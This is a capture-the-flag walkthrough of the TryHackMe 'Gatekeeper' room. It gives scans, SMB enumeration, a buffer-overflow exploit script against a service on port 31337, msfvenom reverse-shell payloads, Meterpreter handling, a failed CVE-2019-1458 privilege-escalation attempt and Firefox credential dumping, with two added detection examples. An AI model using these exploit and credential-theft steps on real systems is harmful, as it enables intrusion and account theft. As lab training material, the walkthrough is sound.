THM Gatekeeper
Can you get past the gate and through the fire?
```
nmap -p- -T4 -Pn $MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-13 13:46 GMT
Nmap scan report for ip-10-10-110-250.eu-west-1.compute.internal (
Host is up (0.00044s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown
MAC Address: 02:D1:76:28:34:57 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1642.77 seconds
```
```
sudo nmap -p 135,139,445,3389,31337 -sV -sC -v -Pn -T4 $MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-13 14:17 GMT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:17
Completed NSE at 14:17, 0.00s elapsed
Initiating NSE at 14:17
Completed NSE at 14:17, 0.00s elapsed
Initiating ARP Ping Scan at 14:17
Scanning [1 port]
Completed ARP Ping Scan at 14:17, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:17
Completed Parallel DNS resolution of 1 host. at 14:17, 0.00s elapsed
Initiating SYN Stealth Scan at 14:17
Scanning ip-10-10-110-250.eu-west-1.compute.internal ( [5 ports]
Discovered open port 31337/tcp on
Completed SYN Stealth Scan at 14:17, 1.24s elapsed (5 total ports)
Initiating Service scan at 14:17
Scanning 1 service on ip-10-10-110-250.eu-west-1.compute.internal (
Completed Service scan at 14:20, 146.16s elapsed (1 service on 1 host)
NSE: Script scanning
Initiating NSE at 14:20
Completed NSE at 14:20, 0.01s elapsed
Initiating NSE at 14:20
Completed NSE at 14:20, 1.01s elapsed
Nmap scan report for ip-10-10-110-250.eu-west-1.compute.internal (
Host is up (0.00018s latency).

PORT      STATE    SERVICE       VERSION
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
3389/tcp  filtered ms-wbt-server
31337/tcp open     Elite?
| fingerprint-strings:
|   FourOhFourRequest:
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines:
|     Hello
|     Hello
|   GetRequest:
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions:
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help:
|     Hello HELP
|   Kerberos:
|     Hello !!!
|   LDAPSearchReq:
|     Hello 0
|     Hello
|   LPDString:
|     Hello
|     default!!!
|   RTSPRequest:
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions:
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq:
|_    Hello
1 service unrecognized despite returning data. ...

NSE: Script Post-scanning.
Initiating NSE at 14:20
Completed NSE at 14:20, 0.00s elapsed
Initiating NSE at 14:20
Completed NSE at 14:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.29 seconds
           Raw packets sent: 10 (424B) | Rcvd: 2 (72B)
```
Interacting with the service on port 31337

```
nc $MACHINE_IP 31337
Hello !!!
Hello Hi!!!
```

The service echoes each line back prefixed with "Hello". Sending a very long string gets the connection kicked out, which is the first hint of an overflow.
Using smbclient to list available shares on the host:

```
smbclient -L $MACHINE_IP
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Users           Disk
SMB1 disabled -- no workgroup available
```
Using smbclient to access the Users share anonymously:

```
smbclient \\\\$MACHINE_IP\\Users
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu May 14 21:57:08 2020
  ..                                 DR        0  Thu May 14 21:57:08 2020
  Default                           DHR        0  Tue Jul 14 03:07:31 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:54:24 2009
  Share                               D        0  Thu May 14 21:58:07 2020

                7863807 blocks of size 4096. 3876715 blocks available
smb: \> cd Share
smb: \Share\> ls
  .                                   D        0  Thu May 14 21:58:07 2020
  ..                                  D        0  Thu May 14 21:58:07 2020
  gatekeeper.exe                      A    13312  Mon Apr 20 01:27:17 2020

                7863807 blocks of size 4096. 3876715 blocks available
```
Getting gatekeeper.exe:

```
smb: \Share\> get gatekeeper.exe
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (5.1 KiloBytes/sec) (average 5.1 KiloBytes/sec)
```
Start a web server on the Kali VM in the directory with the files (to download the files to the Windows VM):

```
python3 -m http.server
```
Exploiting buffer overflow

Get the binary file from the Kali box and follow the stack-based buffer overflow how-to for creating BoF scripts, with:

Offset: 146
JMP ESP address: 080414C3
Bad characters: 00, 0a
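The same facts (one CRLF-terminated line, 146 bytes of filler before the saved return address, NOP padding in front of the shellcode) are what a defender can check for on the service side. The following is an added example, not code from the room or this write-up; MAX_LINE, the scoring thresholds and the two sample lines are assumptions constructed here, since the page only states the offset.

```python
"""Input-side check for a line-oriented echo service like the one on port 31337."""
import re

MAX_LINE = 146                       # assumed safe length, taken from the write-up's offset
NOP_SLED = re.compile(rb"\x90{8,}")  # run of x86 NOPs, like the 16-byte padding in the exploit


def longest_repeat(body: bytes) -> int:
    """Length of the longest run of one repeated byte (filler such as 'AAAA...')."""
    best = run = 0
    for i, b in enumerate(body):
        run = run + 1 if i and body[i - 1] == b else 1
        best = max(best, run)
    return best


def inspect_line(line: bytes) -> dict:
    """Classify one client line; the service reads up to CRLF, so strip that first."""
    body = line.rstrip(b"\r\n")
    printable = sum(32 <= b < 127 for b in body)
    report = {
        "length": len(body),
        "oversized": len(body) > MAX_LINE,
        "nop_sled": NOP_SLED.search(body) is not None,
        "filler_run": longest_repeat(body),
        "non_printable": round(1 - printable / len(body), 2) if body else 0.0,
    }
    shaped = report["nop_sled"] or report["filler_run"] >= 32 or report["non_printable"] > 0.2
    report["verdict"] = "overflow-attempt" if report["oversized"] and shaped else "benign"
    return report


def hardened_handler(line: bytes):
    """Reply 'Hello <input>' as the service does, but only for lines within the limit."""
    if inspect_line(line)["oversized"]:
        return None  # drop the line and close; a bounded read never reaches the saved EIP
    return b"Hello " + line.rstrip(b"\r\n") + b"\r\n"


# Constructed samples: the benign exchange from the page and an overflow-shaped line
# (filler, a dummy 4-byte return address, a NOP run, then arbitrary bytes).
BENIGN = b"Hi!!!\r\n"
OVERFLOW = b"A" * 146 + b"\xde\xad\xbe\xef" + b"\x90" * 16 + bytes(range(1, 128)) + b"\r\n"
```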
Generate the payload with msfvenom (LHOST is the IP address of Kali on the THM network):

```
# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] =
```
Putting the payload in the script:

```python
import socket

ip = ""          # Kali IP on the THM network (left blank on the page)
port = 31337

offset = 146
overflow = "A" * offset
retn = "\xC3\x14\x04\x08"  # JMP ESP address 080414C3, little-endian
padding = "\x90" * 16      # NOP sled in front of the shellcode
payload = (
    ""  # shellcode string from the msfvenom output above (not reproduced on the page)
)
postfix = ""

buffer = overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
except socket.error:
    print("[-] Could not connect.")
```
Start a listener on Kali:

```
$ nc -nlvp 4444
listening on [any] 4444 ...
```

Execute the exploit:

```
$ python3 exploit.py
Sending evil buffer...
```

Catch it in the listener:

```
nc -nlvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
```
Get the first flag:

```
 Volume in drive C has no label.
 Volume Serial Number is 3ABE-D44B

 Directory of C:\Users\natbat\Desktop

05/14/2020  08:24 PM    <DIR>          .
05/14/2020  08:24 PM    <DIR>          ..
04/21/2020  04:00 PM             1,197 Firefox.lnk
04/20/2020  12:27 AM            13,312 gatekeeper.exe
04/21/2020  08:53 PM               135 gatekeeperstart.bat
05/14/2020  08:43 PM               140 user.txt.txt
               4 File(s)         14,784 bytes
               2 Dir(s)  15,757,553,664 bytes free

C:\Users\natbat\Desktop>type user.txt.txt
type user.txt.txt
```
Privilege escalation

Generate a meterpreter payload with msfvenom (LHOST is the IP address of Kali on the THM network):

```
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] =
```
Replacing the shellcode in the script:

```python
import socket

ip = ""          # Kali IP on the THM network (left blank on the page)
port = 31337

offset = 146
overflow = "A" * offset
retn = "\xC3\x14\x04\x08"  # JMP ESP address 080414C3, little-endian
padding = "\x90" * 16      # NOP sled in front of the shellcode
payload = (
    ""  # shellcode string from the second msfvenom run (not reproduced on the page)
)
postfix = ""

buffer = overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
except socket.error:
    print("[-] Could not connect.")
```
Starting msfconsole, selecting the multi handler module, and setting and running the exploit:

```
sudo msfconsole -q
[sudo] password for nina:
[*] Starting persistent handler(s)...
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on
```
Executing the script:

```
python3 exploit2.py
Sending evil buffer...
```

The handler catches the session:

```
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on
[*] Sending stage (175686 bytes) to
[*] Meterpreter session 1 opened ( -> at 2022-12-14 00:45:32 +0000

meterpreter >
```
Backgrounding meterpreter:

```
meterpreter > background
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  1         meterpreter x86/wind  GATEKEEPER\natbat @ G  -> 1
```
Trying wizardopium for CVE-2019-1458:

```
msf6 exploit(multi/handler) > use windows/local/cve_2019_1458_wizardopium
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > show options

Module options (exploit/windows/local/cve_2019_1458_wizardopium):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 x64

View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set SESSION 1
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > show options

Module options (exploit/windows/local/cve_2019_1458_wizardopium):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 x64

View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2019_1458_wizardopium) > exploit

[*] Started reverse TCP handler on
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 1872 launched.
[*] Reflectively injecting the DLL into 1872...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
```
Oh dear. Back to the drawing board. Ah.
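Even a failed attempt like the one above leaves a process tree that stands out on the host: a shell whose parent is the network service, and an msiexec.exe launched beneath that shell. The following is an added example, not from the room or Metasploit; the event list is a constructed, simplified Sysmon-like record (pid, ppid, image, user), with image names taken from the page (gatekeeper.exe started via gatekeeperstart.bat, cmd.exe as the reverse shell, msiexec.exe as the module's DLL host).

```python
"""Process-ancestry check for the post-exploitation chain seen in this write-up."""
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image user")
SERVICE = "gatekeeper.exe"
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed sample tree; PID 1872 mirrors the process number in the module output.
EVENTS = [
    Proc(1100, 600, "winlogon.exe", "SYSTEM"),
    Proc(1400, 1100, "explorer.exe", "GATEKEEPER\\natbat"),
    Proc(1500, 1400, "cmd.exe", "GATEKEEPER\\natbat"),      # runs gatekeeperstart.bat
    Proc(1600, 1500, SERVICE, "GATEKEEPER\\natbat"),        # the listener on 31337
    Proc(1700, 1600, "cmd.exe", "GATEKEEPER\\natbat"),      # reverse shell from the overflow
    Proc(1872, 1700, "msiexec.exe", "GATEKEEPER\\natbat"),  # exploit-launched DLL host
    Proc(1900, 1400, "msiexec.exe", "GATEKEEPER\\natbat"),  # ordinary user-driven install
]


def ancestry(events, pid):
    """Image names from the process itself up to the root, lower-cased."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid].image.lower())
        pid = by_pid[pid].ppid
    return chain


def find_alerts(events):
    """Return (pid, reason, chain) for processes that only an exploit of the service would create."""
    alerts = []
    for e in events:
        chain = ancestry(events, e.pid)
        if len(chain) > 1 and chain[1] == SERVICE and chain[0] in SHELLS:
            alerts.append((e.pid, "network service spawned a shell", " <- ".join(chain)))
        elif chain[0] == "msiexec.exe" and SERVICE in chain[1:]:
            alerts.append((e.pid, "msiexec hosted beneath the exploited service", " <- ".join(chain)))
    return alerts
```

The msiexec rule deliberately keys on the service being somewhere in the ancestry rather than on msiexec.exe itself, so the user-driven install under explorer.exe (PID 1900) is not flagged.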
```
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/firefox_creds
```

Then use the Firefox Decrypt tool from GitHub, and log in to the mayor account using xfreerdp. The flag is on mayor's Desktop.